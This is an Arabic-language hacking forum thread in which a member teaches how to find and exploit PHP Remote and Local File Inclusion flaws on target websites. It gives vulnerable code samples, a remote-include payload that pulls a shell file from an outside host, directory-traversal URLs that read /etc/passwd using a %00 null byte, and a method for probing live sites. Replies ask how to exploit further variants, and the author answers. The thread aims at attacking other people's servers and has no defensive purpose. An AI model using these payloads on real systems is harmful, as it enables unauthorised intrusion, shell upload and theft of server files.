Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]


i-Hmx | Eg-R1z |
  • شكراً: 1269
  • تم شكره 6081 مرة في 755 مشاركة

السلام عليكم
إزى الحال يا شباب
الدرس النهارده عن اكتشاف واستغلال ثغرات
Remote File Include
Local File Include
عايزكو تركزو اكتر على اللوكال
لان اثناء الاستهداف اغلب السكربتات اللى هتقابلك هتكون خاصه
ومش هتقعد تحمل السكربت وتشوف الملفات لسه
فهتلجأ للاستغلال السريع
طبعا الثغره ليها استغلالات كتييييير جدا تساعدنا فى رفع الشل كنت عاملها فيديو قبل كده
وهحط روابط الفيديو فى اخر الشرح
قبل ما ندخل فى الثغره عايز اوضح حاجه بس وهى ../
الأمر ده بيستخدم للرجوع لمجلد للخلف
يعنى نفرض اننا عندنا ثغره فى هذا الملف
كود PHP:
faris.com/test/sec.php?file=about.php 
الملف اللى هو اسمه about.php موجود فى المجلد ده على السيرفر
كود PHP:
/home/faris/public_html/test/about.php 
نفرض ان فيه ملف اسمه config.php
موجود فى المسار ده
كود PHP:
/home/faris/public_html/includes/config.php 
لو عايزين نحمله يبقى هنرجه للخلف مره ../ بحيث نبقى على مجلد Public_html
يعنى يبقى كده
كود PHP:
faris.com/test/sec.php?file=../ 
ونحط مسار الكونفيج عادى
كود PHP:
faris.com/test/sec.php?file=../includes/config.php 
طيب لو الكونفيج هنا مثلا
كود PHP:
 /home/faris/config.php 
يبقى نرجع مجلدين للخلف ونقراه كده
كود PHP:
faris.com/test/sec.php?file=../../config.php 
ياريت تكون الفكره واضحه لاننا هنستعملها كتير اوى
ندخل على الثغره بقى
اللوكال والريموت انكلود ليهم دوال معروفه وهى
Include
Include_once
Require
Require_once
open
fopen
الخطأ بينتج ان المبرمج بيحط متغير بعد الداله على طول زى كده مثلا
كود PHP:
<?php
$sec 
$_GET['file'];
include (
$sec);
?>
المتغير هنا اسمه $sec
وطلبه عن طريق
كود PHP:
 $_GET[file
يبقى لو عندنا ملف مصاب هيبقى الاستغلال كده
كود PHP:
[COLOR=Red]site.com/faris.php?file=http://sec4ever.com/shell.txt?[/COLOR] 
نلاقى الشل اترفع
بس الطريقه دى نادرا لو لقيتها شغاله على سيرفر عشان كده الافضل تشتغل بالطري اللى هتشوفها تحت
يبقى اما نيجى نبحث ممكن نبحث بالطريقه دى
كود PHP:

[COLOR=Red]include($[/COLOR]

[
COLOR=Red]require($[/COLOR
وهكذا باقى الدوال
بس مش شرط طبعا
اهم حاجه يكون جوه قوس الانكلود متغير مفتوح
كود PHP:
include("faris/$file"
عادى
نيجى للوكال انكلود
نفس الدوال لكن بتختلف فى طريقة الكتابه
مثال
كود PHP:
<?php
if (!$_GET['file']) {
    
$sec $_GET['name'].'.php'; {
    }
} else {
    
$sec $_GET['file'].'.php';
    include(
"./$sec");
}
?>
$sec = $_GET['file'].'.php';
هنا بقى هو اللى بيضيف امتداد البى اتش بى للملف
وخد بالك من دى كده
كود PHP:
[COLOR=Red]include("./$sec");[/COLOR
مش هينفع تعمل انكلود من بره السيرفر
عشان كده اسمها لوكال انكلود
يبقى لو جينا نقرا مثلا ملف
كود PHP:
 /etc/passwd 
بفرض ان ده الملف المصاب
كود PHP:
faris.com/test/sec.php?file
ومساره هنا
كود PHP:
/home/faris/public_html/test/sec.php 
ملف اليوزرات بيبقى كده
كود PHP:
/etc/passwd 
يبقى لازم نرجع اربع مرات عشان نعرف نقراه
كود PHP:
faris.com/test/sec.php?file=../../../../etc/passwd 
لو قريته هيديك خطأ
لانه اثناء التنفيذ اضاف امتداد بى اتش بى وبالتالى هيقراه كده
كود PHP:
../../../../etc/passwd.php 
وده طبعا ملف مش موجود
عشان كده بنضيف ال Null
اللى هى
كود PHP:
%00 
بعد اسم الملف
ودى وظيفتها بتلغى اى امتداد بعدها
يبقى الاستغلال هيبقى كده
كود PHP:
faris.com/test/sec.php?file=../../../../etc/passwd%00 
فى السيرفر هيبقى كده
كود PHP:
include(../../../../etc/passwd); 
وهيتقرا زى الفل
البحث عن اللوكال انكلود نفس الريموت انكلود
نيجى للمهم بقى
انت مش كل سكربت هتشوفه هتقدر تنزله عشان تفحصه
فهتشوفه مصاب ولا لا اونلاين
بنفس الطريقه
لو فيه موقع اسمه
كود PHP:
sec4ever.com/index.php?page=about 
هيقابلك كتير على فكره
وفى الشرح اللى هتشوفه دلوقت اللى هو
LFI -=> LFD
نفس الطريقه
بس خلينا نشرحها كتابه الاول
كل اللى هتعمله تشيل كلمة
about
وتحط مكانها
كود PHP:
../ 
يبقى الرابط كده
كود PHP:
sec4ever.com/index.php?page=../ 
لو مصاب هتلاقيه اداك خطأ زى ده
كود PHP:
Warning: include(../.php) [function.include]: failed to open streamNo such file or directory in
Warning
: include() [function.include]: Failed opening '../.php' for inclusion (include_path='.;C:\php5\pear'in 
ساعتها تقدر تكمل الاستغلال عادى جدا زى مهتشوف فى الشروحات
لحد كده كفايه على الاكتشاف
ملف فيديوهات طرق الاستغلال والاختبار فى المرفقات
تحويل ثغرات الLFI & RFI الى LFD
http://www.mirrorcreator.com/files/0....com.rar_links
أو رابط بتاريخ 13/02/2012
http://www.filesin.com/F3374148125/download.html
اى استفسار
موجود ان شاء الله

محمدلينوكس عضو مميز
  • شكراً: 253
  • تم شكره 35 مرة في 19 مشاركة

بارك الله فيك اخي متابع معاك خطوة خطوة

الأعضاء الذين قالوا شكراً لـ محمدلينوكس على المشاركة المفيدة:
Dr.Xxs SyRiAn عضو نشيط
  • شكراً: 2
  • تم شكره 21 مرة في 8 مشاركة

مشكور يا غالي ,~

بس ما كأني ثغرات ال Remote File Include إنقرضت منذ زمن ,~

تحيتي لك

2 أعضاء قالوا شكراً لـ Dr.Xxs SyRiAn على المشاركة المفيدة:
i-Hmx | Eg-R1z |
  • شكراً: 1269
  • تم شكره 6081 مرة في 755 مشاركة

الريموت انقرضت لكن اللوكال لا

الأعضاء الذين قالوا شكراً لـ i-Hmx على المشاركة المفيدة:
محمدلينوكس عضو مميز
  • شكراً: 253
  • تم شكره 35 مرة في 19 مشاركة

طيب سوأل اذا كان هيك كيف يكون الاستغلال

include("faris/$sec");

s4udiT3rr0rist S4E Team
  • شكراً: 644
  • تم شكره 978 مرة في 380 مشاركة

الف شكر ياريس على الشروحات الراائعه

توقيع

i-
Hmx-+On eht mic
p3rL
is My Lov3
المعرفة هي القوة ، وتقاسم المعرفة هي القوة المفقودة
knowledge is power, knowledge shared is power lost


Sec4ever الحماية للأبد
  • شكراً: 3488
  • تم شكره 5364 مرة في 949 مشاركة

جميل جدا اخى فارس شرح رائع و منسق.

بالنسبة للأخ الى قال انقرضت الثغرات نقول له لكن المبرمجين مزالوا يقعون فيها .

توقيع
الأعضاء الذين قالوا شكراً لـ Sec4ever على المشاركة المفيدة:
FoX HaCkEr PyThon Lov3r
  • شكراً: 341
  • تم شكره 569 مرة في 107 مشاركة

المشاركة الأصلية كتبت بواسطة dr.xxs syrian اقتباس :
مشكور يا غالي ,~

بس ما كأني ثغرات ال remote file include إنقرضت منذ زمن ,~

تحيتي لك

مافيه شي في الهاك اسمه انقرض

توقيع
\/1\/4 $3(Ur17'/ Ph0r 3\/3r
الأعضاء الذين قالوا شكراً لـ FoX HaCkEr على المشاركة المفيدة:
i-Hmx | Eg-R1z |
  • شكراً: 1269
  • تم شكره 6081 مرة في 755 مشاركة

منورين يا شباب
شوف يا حماده
بالنسبه لدى
include("faris/$sec");
كل اللى هنعمله فى الاستغلال هنرجع للخلف مجلد زياده
بس
بكده هنطير المجلد اللى اسمه faris

زحوفي TeaM D
  • شكراً: 0
  • تم شكره 8 مرة في 5 مشاركة

يعطيك العافية فارس ..

لكن ياليت مثال على
open
fopen

كيف شكل الاصابه فيه ؟

open($name , r )

$namde = txt.php

كيف بيكون الاستغلال .؟